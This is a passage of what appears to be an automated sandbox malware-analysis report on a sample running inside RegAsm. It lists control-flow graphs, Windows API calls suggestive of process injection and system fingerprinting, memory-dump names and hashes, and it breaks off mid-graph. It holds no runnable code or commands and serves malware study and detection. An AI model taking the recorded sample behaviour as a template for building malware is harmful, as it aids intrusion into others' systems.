            control_flow_graph 330 cf2ae0-cf2b63 VirtualAllocEx 333 cf2b6c-cf2b91 330->333 334 cf2b65-cf2b6b 330->334 334->333
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CF2B56
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: e40ca757b969a3c2f9fbf7967693eec31edab9b6aa6762f7548d2b0b258112b9
            • Instruction ID: 9439774e9e17f4f5aa0d29a8f62d2b132040ca245515af7dcd5e063732c1728e
            • Opcode Fuzzy Hash: e40ca757b969a3c2f9fbf7967693eec31edab9b6aa6762f7548d2b0b258112b9
            • Instruction Fuzzy Hash: 8C115675C002488FDB20DFAAC845BEEBBF5AB48320F108419E926A7250C7799901CFA0
            Function 00CF2958 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 338 cf2958-cf29cf ResumeThread 341 cf29d8-cf29fd 338->341 342 cf29d1-cf29d7 338->342 342->341
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: bda6d60a69e393ccd6eeb6b86e5b734166d3c6cfb7f88a636c0ab2492dcc7676
            • Instruction ID: e17ece61a7aab04b17460bea8f71a5f3f76c9905818764e76c241c8eaaa4ed4c
            • Opcode Fuzzy Hash: bda6d60a69e393ccd6eeb6b86e5b734166d3c6cfb7f88a636c0ab2492dcc7676
            • Instruction Fuzzy Hash: C9117970C003488FDB20DFAAC4457EEFBF4AB48314F20841DC455A3240C7795905CF90
            Function 00CF2AE8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 346 cf2ae8-cf2b63 VirtualAllocEx 349 cf2b6c-cf2b91 346->349 350 cf2b65-cf2b6b 346->350 350->349
            APIs
            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00CF2B56
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 8308fbc7046a509bd6a77ee9e8bb6d0a2297fb6900bd890c92b89929f34ad904
            • Instruction ID: eb183253649c05b64fe6a378337f39c30966282863857b6e2c7eed7f05a1d262
            • Opcode Fuzzy Hash: 8308fbc7046a509bd6a77ee9e8bb6d0a2297fb6900bd890c92b89929f34ad904
            • Instruction Fuzzy Hash: 20112675C003499FDB20DFAAC845BEEBBF5EB48320F148419E929A7250CB759941CFA5
            Function 00CF2960 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 354 cf2960-cf29cf ResumeThread 357 cf29d8-cf29fd 354->357 358 cf29d1-cf29d7 354->358 358->357
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1253008950.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cf0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 7287101b38b9e1c5b13154dfe39834b86a1c581b3f8a2d6742bd813bf4fb095e
            • Instruction ID: 517a6526ad23ddf8e31359ec5b2aa39eb2f4aa22c299f5f69a3270e20349b9cc
            • Opcode Fuzzy Hash: 7287101b38b9e1c5b13154dfe39834b86a1c581b3f8a2d6742bd813bf4fb095e
            • Instruction Fuzzy Hash: 2C116A71D003498FDB20DFAAC4457AEFBF4EB48320F108419D559A7340CB756941CFA4
            Function 00C9D7F1 Relevance: .0, Instructions: 45COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1252917437.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c9d000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3d13f5eb45b2f392b5a96c124572f39ee06dc934c3181a54565ad664900b88f3
            • Instruction ID: df77009957ecd7ff40376ec6f4fdefe79ecaf9f97d95130a21459bdff8428de1
            • Opcode Fuzzy Hash: 3d13f5eb45b2f392b5a96c124572f39ee06dc934c3181a54565ad664900b88f3
            • Instruction Fuzzy Hash: E801F7314083449AEB204A12CCC8B66BB98EF40365F14C05AED1A2A2C3C2349844CAF9
            Function 00C9D7F0 Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1252917437.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c9d000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1506f324d1a8792ed746b022559ef882026892fed8f0635cc230040f7b43940f
            • Instruction ID: 58d9514b61870d2e95617a7fb016b909532b56dd8e5d7c7b508a881b42fccd35
            • Opcode Fuzzy Hash: 1506f324d1a8792ed746b022559ef882026892fed8f0635cc230040f7b43940f
            • Instruction Fuzzy Hash: 91F0CD71408344AEEB208A06CCC8B66FF98EB90734F18C05EED191B2C3C278AC40CAB5

            Execution Graph

            Execution Coverage:2.7%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:36.9%
            Total number of Nodes:122
            Total number of Limit Nodes:13
            execution_graph 11794 433de3 11795 433e21 11794->11795 11796 433e5a LoadLibraryExW 11794->11796 11795->11796 11797 433e69 11796->11797 11798 409930 11799 409939 11798->11799 11800 409949 GetCurrentProcess 11799->11800 11808 409947 ExitProcess 11799->11808 11802 409954 11800->11802 11803 40995a GetWindowInfo 11802->11803 11805 409958 11802->11805 11812 40a810 11803->11812 11835 433ec0 11805->11835 11806 409975 11806->11805 11830 40ce00 11806->11830 11810 409980 11811 40bcf0 FreeLibrary CoUninitialize 11810->11811 11811->11805 11813 40a865 11812->11813 11814 40a8a6 LoadLibraryExW 11812->11814 11813->11814 11816 40a8bf 11814->11816 11817 40aab3 11816->11817 11821 40ad08 11816->11821 11822 40ad7a 11816->11822 11838 40b000 11816->11838 11842 40b5e0 11817->11842 11818 40ad48 CoInitializeEx 11819 40ad5a CoInitializeSecurity 11818->11819 11818->11822 11819->11822 11821->11818 11821->11822 11822->11806 11823 40afdc 11824 432140 RtlFreeHeap 11823->11824 11824->11822 11825 40b000 RtlFreeHeap 11826 40af88 11825->11826 11826->11823 11827 40af8f 11826->11827 11846 432140 11827->11846 11828 40ac08 11828->11822 11828->11823 11828->11825 11833 40ce41 11830->11833 11831 40d274 GetSystemDirectoryW 11831->11833 11832 40d30c 11833->11831 11833->11832 11834 432140 RtlFreeHeap 11833->11834 11834->11833 11854 434f90 11835->11854 11837 433ec5 FreeLibrary 11837->11808 11841 40b040 11838->11841 11839 40b384 11839->11816 11840 432140 RtlFreeHeap 11840->11839 11841->11839 11841->11840 11841->11841 11843 40b670 11842->11843 11843->11843 11845 40b695 11843->11845 11850 433ee0 11843->11850 11845->11828 11845->11845 11847 4321e2 11846->11847 11848 432157 RtlFreeHeap 11846->11848 11847->11821 11848->11847 11851 433f06 11850->11851 11853 433f00 11850->11853 11852 432140 RtlFreeHeap 11851->11852 11851->11853 11852->11853 11853->11843 11855 434f99 11854->11855 11855->11837 11856 40bfe1 11857 40c009 11856->11857 11858 40c38a 11857->11858 11859 40c398 11857->11859 11860 433ee0 RtlFreeHeap 11857->11860 11858->11859 11861 432140 RtlFreeHeap 11858->11861 11860->11857 11861->11859 11862 432111 11863 432117 RtlAllocateHeap 11862->11863 11864 42eb21 11865 42eb9c SysAllocString 11864->11865 11873 42eb20 11864->11873 11865->11873 11866 42ed53 11868 42ed5c SysFreeString 11866->11868 11867 42ebd1 CoSetProxyBlanket 11867->11866 11869 42ed3d SysFreeString SysFreeString 11867->11869 11867->11873 11871 42ed71 11868->11871 11869->11866 11870 42ec59 SysAllocString 11872 42ed0c SysAllocString 11870->11872 11870->11873 11872->11873 11873->11864 11873->11865 11873->11866 11873->11867 11873->11868 11873->11869 11873->11870 11873->11872 11873->11873 11874 42ef57 CoCreateInstance 11873->11874 11875 42ef4b 11873->11875 11876 42ef6f CoCreateInstance 11873->11876 11877 42ed90 11873->11877 11874->11876 11875->11874 11875->11875 11875->11876 11879 42ef9f 11876->11879 11877->11875 11878 42ef06 GetVolumeInformationW 11877->11878 11877->11879 11880 42edaf 11877->11880 11881 42efb4 11877->11881 11882 42f112 11877->11882 11889 42f08e 11877->11889 11890 42efdf 11877->11890 11878->11877 11878->11879 11878->11880 11878->11881 11878->11882 11878->11889 11878->11890 11894 435ef0 11879->11894 11884 435ef0 LdrInitializeThunk 11881->11884 11885 432140 RtlFreeHeap 11882->11885 11884->11890 11891 42f118 11885->11891 11888 432420 LdrInitializeThunk 11888->11889 11889->11880 11889->11882 11889->11888 11899 432590 11889->11899 11903 432660 11889->11903 11890->11880 11890->11882 11890->11889 11898 433fa0 LdrInitializeThunk 11890->11898 11891->11880 11911 433fa0 LdrInitializeThunk 11891->11911 11895 435f10 11894->11895 11896 43605e 11895->11896 11912 433fa0 LdrInitializeThunk 11895->11912 11896->11881 11898->11889 11900 43261e 11899->11900 11901 43259a 11899->11901 11900->11889 11901->11900 11913 433fa0 LdrInitializeThunk 11901->11913 11904 432706 11903->11904 11905 432676 11903->11905 11904->11889 11905->11904 11909 4326fe 11905->11909 11914 433fa0 LdrInitializeThunk 11905->11914 11906 43284e 11906->11904 11907 432590 LdrInitializeThunk 11906->11907 11907->11904 11909->11906 11915 433fa0 LdrInitializeThunk 11909->11915 11911->11880 11912->11896 11913->11900 11914->11909 11915->11906 11916 42e876 11917 42e892 VariantInit 11916->11917 11918 42eb02 VariantClear 11916->11918 11919 42e948 SysStringLen 11916->11919 11921 42eb12 SysFreeString SysFreeString 11916->11921 11926 42e967 11916->11926 11920 42e8eb 11917->11920 11918->11921 11919->11926 11920->11918 11920->11919 11920->11926 11923 42ed53 SysFreeString 11921->11923 11925 42ed71 11923->11925 11926->11918 11926->11925 11927 43406b 11928 4343ae 11927->11928 11932 434079 11927->11932 11929 43447e 11928->11929 11931 4344be 11928->11931 11938 433fa0 LdrInitializeThunk 11928->11938 11929->11931 11939 433fa0 LdrInitializeThunk 11929->11939 11934 4346ce 11931->11934 11940 433fa0 LdrInitializeThunk 11931->11940 11932->11928 11932->11929 11932->11931 11937 433fa0 LdrInitializeThunk 11932->11937 11937->11928 11938->11929 11939->11931 11940->11934

            Executed Functions

            Function 0042EB21 Relevance: 25.1, APIs: 10, Strings: 4, Instructions: 640memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 42eb21-42eb63 1 42eb65 0->1 2 42eb9c-42ebc1 SysAllocString 0->2 3 42eb70-42eb9a 1->3 4 42ebc5-42ebca 2->4 3->2 3->3 5 42ed53-42ed58 4->5 6 42ebd1-42ebed CoSetProxyBlanket 4->6 7 42ebf4-42ec15 4->7 8 42ed5c-42ed76 SysFreeString 4->8 9 42ed3d-42ed51 SysFreeString * 2 4->9 5->8 6->5 6->7 6->9 10 42ec17 7->10 11 42ec59-42ecd5 SysAllocString 7->11 16 42ed80 8->16 9->5 13 42ec20-42ec57 10->13 14 42ecd7 11->14 15 42ed0c-42ed2d SysAllocString 11->15 13->11 13->13 17 42ece0-42ed0a 14->17 18 42ed31-42ed36 15->18 16->16 17->15 17->17 18->5 18->6 18->7 18->8 18->9 19 42eb20 18->19 20 42ef57-42ef69 CoCreateInstance 18->20 21 42ef4b-42ef50 18->21 22 42ef6f-42ef81 CoCreateInstance 18->22 23 42eeed-42ef01 call 4354e0 18->23 19->0 20->22 21->20 21->21 21->22 26 42ef9f-42efb7 call 435ef0 22->26 25 42ef06-42ef26 GetVolumeInformationW 23->25 25->26 27 42edc2-42edc4 25->27 28 42edc0 25->28 29 42eec0 25->29 30 42efc0-42efdf call 435ef0 25->30 31 42eeca-42eed3 25->31 32 42f1cb 25->32 33 42f112-42f134 call 432140 25->33 34 42ed90-42ed97 25->34 35 42edd0 25->35 36 42f110 25->36 37 42f1d4-42f21a call 432400 call 432420 25->37 38 42eeda-42eee6 25->38 39 42ed9e-42eda8 25->39 40 42f0e0 25->40 41 42f220-42f263 call 432400 call 432420 25->41 42 42f0e6-42f0f8 25->42 43 42efe8-42eff0 25->43 44 42edaf-42edb5 25->44 45 42f26c-42f271 25->45 46 42ef2d-42ef34 25->46 47 42eeb0 25->47 48 42f1b0-42f1c4 call 432590 25->48 49 42eeb6-42eeba 25->49 50 42eff7-42eff9 25->50 51 42ef35-42ef44 25->51 52 42f278-42f290 call 432660 25->52 53 42effe-42f029 call 432080 25->53 54 42f0ff-42f104 25->54 26->30 61 42edd3-42ee0f 27->61 29->31 30->43 31->26 31->29 31->30 31->31 31->32 31->33 31->36 31->37 31->38 31->40 31->41 31->42 31->43 31->45 31->47 31->48 31->49 31->50 31->52 31->53 31->54 32->37 77 42f136 33->77 78 42f16e-42f176 33->78 34->26 34->27 34->28 34->29 34->30 34->31 34->33 34->35 34->38 34->39 34->40 34->42 34->43 34->44 34->47 34->49 34->50 34->53 34->54 35->61 37->41 38->23 38->26 38->27 38->28 38->29 38->30 38->31 38->32 38->33 38->34 38->35 38->36 38->37 38->38 38->39 38->40 38->41 38->42 38->43 38->44 38->45 38->46 38->47 38->48 38->49 38->50 38->52 38->53 38->54 39->26 39->27 39->28 39->29 39->30 39->31 39->33 39->35 39->38 39->40 39->42 39->43 39->44 39->47 39->49 39->50 39->53 39->54 41->45 42->32 42->33 42->36 42->37 42->41 42->45 42->48 42->52 42->54 43->32 43->33 43->36 43->37 43->40 43->41 43->42 43->45 43->48 43->50 43->52 43->53 43->54 44->28 45->48 45->52 48->32 48->33 48->36 48->37 48->41 48->45 48->52 48->54 49->29 58 42f2b4-42f2bb 50->58 51->21 51->26 51->27 51->28 51->29 51->30 51->31 51->32 51->33 51->34 51->35 51->36 51->37 51->38 51->39 51->40 51->41 51->42 51->43 51->44 51->45 51->46 51->47 51->48 51->49 51->50 51->52 51->53 51->54 52->48 75 42f02b 53->75 76 42f05c-42f06a 53->76 54->36 72 42ee60-42ee67 61->72 73 42ee11-42ee19 61->73 81 42ee86-42ee8b 72->81 79 42ee70-42ee75 73->79 80 42ee1b-42ee1f 73->80 84 42f030-42f05a 75->84 87 42f0be-42f0ca 76->87 88 42f06c-42f074 76->88 91 42f140-42f16c 77->91 92 42f2af-42f2b2 78->92 93 42f17c-42f187 78->93 85 42ee77-42ee83 79->85 86 42ee44-42ee4f 79->86 95 42ee20-42ee3d 80->95 89 42ee90-42ee98 81->89 84->76 84->84 85->81 86->81 87->32 87->33 87->36 87->37 87->40 87->41 87->42 87->45 87->48 87->52 87->54 96 42f080-42f087 88->96 89->89 99 42ee9a-42eea4 89->99 91->78 91->91 92->58 97 42f190-42f197 93->97 95->95 98 42ee3f-42ee42 95->98 100 42f093-42f09c 96->100 101 42f089-42f08c 96->101 102 42f295-42f29b 97->102 103 42f19d-42f1a0 97->103 98->85 98->86 99->26 99->29 99->30 99->31 99->32 99->33 99->36 99->37 99->38 99->40 99->41 99->42 99->43 99->45 99->47 99->48 99->49 99->50 99->52 99->53 99->54 100->87 106 42f09e-42f0bb call 433fa0 100->106 101->96 105 42f08e-42f091 101->105 102->92 104 42f29d-42f2ac call 433fa0 102->104 103->97 107 42f1a2 103->107 104->92 105->87 106->87 107->92
            APIs
            • SysAllocString.OLEAUT32(?), ref: 0042EB9D
            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0042EBE2
            • SysAllocString.OLEAUT32(29DD2BDD), ref: 0042EC5D
            • SysAllocString.OLEAUT32(29DD2BDD), ref: 0042ED0D
            • SysFreeString.OLEAUT32(?), ref: 0042ED49
            • SysFreeString.OLEAUT32(?), ref: 0042ED51
            • SysFreeString.OLEAUT32(?), ref: 0042ED62
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String$AllocFree$BlanketProxy
            • String ID: 4`[b$7654$/.-$B
            • API String ID: 3215672481-2456291547
            • Opcode ID: 1f52f75ee9fbd9a2817593f0f2cd6b7df647ac44ab142d147d39e02bf424dc0f
            • Instruction ID: d208b6dcd48daf2608e56d970aedca86ac8594f7c4363f7bc0ec2ba55e37e436
            • Opcode Fuzzy Hash: 1f52f75ee9fbd9a2817593f0f2cd6b7df647ac44ab142d147d39e02bf424dc0f
            • Instruction Fuzzy Hash: C612DC70A00700DFEB24CF29D891B6ABBF1FF49304F50892DE5969B7A1D779A805CB58
            Function 0043406B Relevance: 5.8, Strings: 4, Instructions: 752COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 297 43406b-434072 298 4340d1-4340d7 297->298 299 434100-434129 297->299 300 434140-434199 297->300 301 4341a6-4341b3 297->301 302 4340fa 297->302 303 434079-434092 297->303 304 4343e9-434417 297->304 305 43421e-434264 297->305 306 4343de-4343e0 297->306 313 4340da-4340f3 call 435cf0 298->313 299->300 300->301 307 4341b5 301->307 308 4341ea-4341f5 301->308 302->299 309 434094 303->309 310 4340ca-4340cf 303->310 311 434419 304->311 312 43444c-434457 304->312 314 434266 305->314 315 43429a-4342a8 305->315 306->304 318 4341c0-4341e8 307->318 319 434211-434219 308->319 320 4341f7-4341ff 308->320 316 4340a0-4340c8 309->316 310->313 321 434420-43444a 311->321 322 4344b2-4344b7 312->322 323 434459-434461 312->323 313->299 313->300 313->301 313->302 313->304 313->305 313->306 330 4344c5 313->330 335 4344be-4344c0 313->335 324 434270-434298 314->324 325 4342c1 315->325 326 4342aa-4342af 315->326 316->310 316->316 318->308 318->318 338 4342c6-4342d6 call 4333f0 319->338 337 434200-43420f 320->337 321->312 321->321 327 4344e0-4344f1 call 434800 322->327 328 434590-434599 322->328 329 434576 322->329 322->330 331 4345a5-4345c1 322->331 332 4344cb-4344df call 434800 322->332 333 4344fa-434508 322->333 334 43450f-43452f 322->334 322->335 336 43457c-43458b 322->336 339 434470-434477 323->339 324->315 324->324 325->338 341 4342b0-4342bf 326->341 327->333 328->331 329->336 330->332 348 4345c3 331->348 349 4345fe-434606 331->349 332->327 333->328 333->329 333->331 333->334 333->336 346 434531 334->346 347 43456a-434574 334->347 343 43464c-43466b 335->343 336->328 337->319 337->337 362 4342f1-43434a 338->362 363 4342d8-4342db 338->363 350 434483-43448c 339->350 351 434479-43447c 339->351 341->325 341->341 353 43469e-4346a9 343->353 354 43466d-43466f 343->354 357 434540-434568 346->357 347->331 358 4345d0-4345fc 348->358 349->343 359 434608-434613 349->359 350->322 361 43448e-4344aa call 433fa0 350->361 351->339 360 43447e-434481 351->360 365 4346ab-4346b6 353->365 366 4346dc-4346de 353->366 364 434670-43469c 354->364 357->347 357->357 358->349 358->358 367 434620-434627 359->367 360->322 386 4344af 361->386 370 43437c-434387 362->370 371 43434c-43434f 362->371 369 4342e0-4342ef 363->369 364->353 364->364 372 4346c0-4346c7 365->372 373 434703-434734 366->373 374 4347f2-4347f9 366->374 375 434812-43482f 366->375 376 4347e0 366->376 377 4347f0 366->377 378 434917-434922 366->378 379 4346e5-4346fc call 435cf0 366->379 380 4347e4-4347ea 366->380 381 434899-4348c4 366->381 382 434929 366->382 383 4347cd-4347d3 366->383 384 434630-434636 367->384 385 434629-43462c 367->385 369->362 369->369 392 434389-434391 370->392 393 4343cf-4343d7 370->393 387 434350-43437a 371->387 388 4346d0-4346d6 372->388 389 4346c9-4346cc 372->389 395 434736 373->395 396 43476c-434773 373->396 375->381 399 434831 375->399 376->380 378->373 378->374 378->375 378->376 378->377 378->378 378->379 378->380 378->381 378->382 378->383 379->373 379->374 379->375 379->376 379->377 379->378 379->380 379->381 379->382 379->383 380->377 390 434890 381->390 391 4348c6 381->391 383->376 384->343 398 434638-434644 call 433fa0 384->398 385->367 397 43462e 385->397 386->322 387->370 387->387 388->366 403 434790-43479a call 433fa0 388->403 389->372 401 4346ce 389->401 390->381 402 4348d0-434910 391->402 404 4343a0-4343a7 392->404 393->304 393->306 393->327 393->328 393->329 393->330 393->331 393->332 393->333 393->334 393->335 393->336 406 434740-43476a 395->406 396->383 407 434775-43477a 396->407 397->343 415 434649 398->415 400 434840-434880 399->400 400->400 409 434882 400->409 401->366 402->402 410 434912 402->410 419 43479f-4347a4 403->419 411 4343b0-4343b6 404->411 412 4343a9-4343ac 404->412 406->396 406->406 413 434780-43478c 407->413 409->390 410->390 411->393 417 4343b8-4343c7 call 433fa0 411->417 412->404 416 4343ae 412->416 421 43478e 413->421 415->343 416->393 422 4343cc 417->422 419->373 419->374 419->375 419->376 419->377 419->378 419->379 419->380 419->381 419->382 419->383 421->383 422->393
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %sgh$0mrs$4`[b$GC
            • API String ID: 0-977343894
            • Opcode ID: fc32d9ced189cf6374c410164aff830010b6ef61b34dd62e774bd4f35da11266
            • Instruction ID: 98d9df69f66ed30905ed8ad65f3aad93e7dedcb94b99b17d03a419621e4ea0be
            • Opcode Fuzzy Hash: fc32d9ced189cf6374c410164aff830010b6ef61b34dd62e774bd4f35da11266
            • Instruction Fuzzy Hash: 06328DB4E0021ACBDB14CF98D9917BEB7B1FF8A300F245569D8516B391D338AD51CBA8
            Function 00433FA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 590 433fa0-433fd2 LdrInitializeThunk
            APIs
            • LdrInitializeThunk.NTDLL(004347CA,00000000,00000004,000000FF,00000028,?,0000000C), ref: 00433FCE
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
            Function 0042E876 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 231COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 112 42e876-42e88b 113 42eb12-42ed58 SysFreeString * 2 112->113 114 42e892-42e8e9 VariantInit 112->114 115 42eb02-42eb0e VariantClear 112->115 116 42eaa0-42eaaf 112->116 117 42eaf0-42eaf9 call 4091d0 112->117 118 42eac6 112->118 119 42eab6-42eabf 112->119 120 42ead5-42eae1 call 4091d0 112->120 121 42e948-42e983 SysStringLen call 426160 call 4091c0 112->121 122 42eacf 112->122 142 42ed5c-42ed76 SysFreeString 113->142 125 42e8eb 114->125 126 42e91e-42e92b 114->126 115->113 116->115 116->117 116->118 116->119 116->120 116->122 123 42ed80 116->123 117->115 118->122 119->115 119->116 119->117 119->118 119->119 119->120 119->122 119->123 120->117 139 42ea85-42ea95 121->139 140 42e989-42e9b4 121->140 122->120 123->123 131 42e8f0-42e91c 125->131 136 42e92f-42e941 126->136 131->126 131->131 136->115 136->116 136->117 136->118 136->119 136->120 136->121 136->122 139->115 139->116 139->117 139->118 139->119 139->120 139->122 139->123 141 42e9d4-42e9db 140->141 143 42e9e9-42e9f2 141->143 144 42e9dd-42e9e3 141->144 142->123 146 42ea82 143->146 147 42e9f8-42e9fc 143->147 144->139 144->143 146->139 148 42e9b6-42e9b8 147->148 149 42e9fe-42ea17 147->149 150 42e9bd-42e9ce 148->150 151 42ea44-42ea52 149->151 152 42ea19-42ea20 149->152 150->139 150->141 151->150 154 42ea58-42ea7d 151->154 152->151 153 42ea22-42ea3f 152->153 153->150 154->150
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.1291188423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: String$Free$Variant$ClearInit
            • String ID: B
            • API String ID: 4205145696-3806887055
            • Opcode ID: 21028c80cd4026167bb69fda4869c2a8315c8d17ec0b3906e11f670861941946
            • Instruction ID: fcfcb4cb4f68b1e8097e57e2e1d3c881d061160ce27179147b48dec2388d3295
            • Opcode Fuzzy Hash: 21028c80cd4026167bb69fda4869c2a8315c8d17ec0b3906e11f670861941946
            • Instruction Fuzzy Hash: 728166B4604B00CFD724CF25D881B66B7A2FF5A304F44892ED49A8BBA1D735F846CB45
            Function 0040A810 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 586libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 155 40a810-40a863 156 40a865 155->156 157 40a8a6-40a8c3 LoadLibraryExW call 4333d0 155->157 158 40a870-40a8a4 156->158 161 40a8c9-40a9e9 call 4354e0 * 12 157->161 162 40afea-40aff6 157->162 158->157 158->158 187 40a9f0-40aa08 call 42f2c0 161->187 190 40aa10-40aa17 187->190 190->190 191 40aa19-40aa2b 190->191 192 40aa91-40aaa1 call 40b000 191->192 193 40aa2d-40aa36 191->193 200 40aaa7-40aaad 192->200 201 40ad08-40ad10 192->201 195 40aa40-40aa43 193->195 197 40aa80-40aa83 195->197 198 40aa45-40aa64 call 40cc80 195->198 199 40aa86-40aa8a 197->199 207 40aa66-40aa6c 198->207 208 40aa6e-40aa74 198->208 199->192 200->187 204 40aab3-40abaf 200->204 205 40ad12-40ad17 201->205 206 40ad3f 201->206 209 40abb1 204->209 210 40abf4-40ac0d call 40b5e0 204->210 211 40ad20-40ad32 205->211 212 40ad48-40ad54 CoInitializeEx 206->212 207->195 207->208 208->199 215 40abc0-40abf2 209->215 213 40afe8 210->213 221 40ac13-40ac78 210->221 211->211 217 40ad34-40ad3d 211->217 212->213 214 40ad5a-40ad74 CoInitializeSecurity 212->214 213->162 214->213 218 40ad7a-40ad7f call 42e700 214->218 215->210 215->215 217->212 224 40ad84-40ad89 218->224 222 40acc1-40accc 221->222 223 40ac7a 221->223 226 40acd2-40acd6 222->226 227 40ad8e 222->227 225 40ac80-40acbf 223->225 224->162 225->222 225->225 228 40aceb-40acef 226->228 229 40ad90-40ad92 227->229 230 40acf5-40acfc 228->230 231 40afdc-40afe5 call 432140 228->231 229->231 232 40ad98-40adbc 229->232 233 40ad02 230->233 234 40acfe-40ad00 230->234 231->213 235 40adf6-40adff 232->235 236 40adbe-40adbf 232->236 239 40ace0-40ace5 233->239 240 40ad04-40ad06 233->240 234->233 241 40ae01-40ae0b 235->241 242 40ae34-40ae36 235->242 238 40adc0-40adf4 236->238 238->235 238->238 239->228 239->229 240->239 245 40ae17-40ae1b 241->245 242->231 244 40ae3c-40ae44 242->244 246 40ae50-40ae58 244->246 245->231 247 40ae21-40ae28 245->247 246->246 248 40ae5a-40ae5d 246->248 249 40ae2a-40ae2c 247->249 250 40ae2e 247->250 253 40ae63-40ae65 248->253 254 40af05-40af14 248->254 249->250 251 40ae10-40ae15 250->251 252 40ae30-40ae32 250->252 251->242 251->245 252->251 255 40aed1-40aed3 253->255 256 40ae67-40ae70 253->256 257 40af20-40af27 254->257 258 40aed5-40aeda 255->258 259 40ae87-40ae94 256->259 257->257 260 40af29-40af3f 257->260 258->254 261 40aedc-40aee9 258->261 262 40ae96-40ae9e 259->262 263 40aeaa-40aebe 259->263 264 40af41 260->264 265 40af7d-40af8d call 40b000 260->265 266 40aeeb-40aef3 261->266 267 40aefe 261->267 269 40aea0-40aea3 262->269 270 40aea5-40aea8 262->270 272 40aec0-40aec8 263->272 273 40ae77-40ae85 263->273 271 40af43-40af47 264->271 265->231 281 40af8f-40af9e 265->281 274 40aef5-40aef7 266->274 275 40aef9-40aefc 266->275 267->254 269->270 270->263 277 40af77-40af7a 271->277 278 40af49-40af65 call 40cc80 271->278 279 40ae72-40ae75 272->279 280 40aeca-40aecf 272->280 273->258 273->259 274->275 275->267 277->265 288 40af67-40af6d 278->288 289 40af6f-40af75 278->289 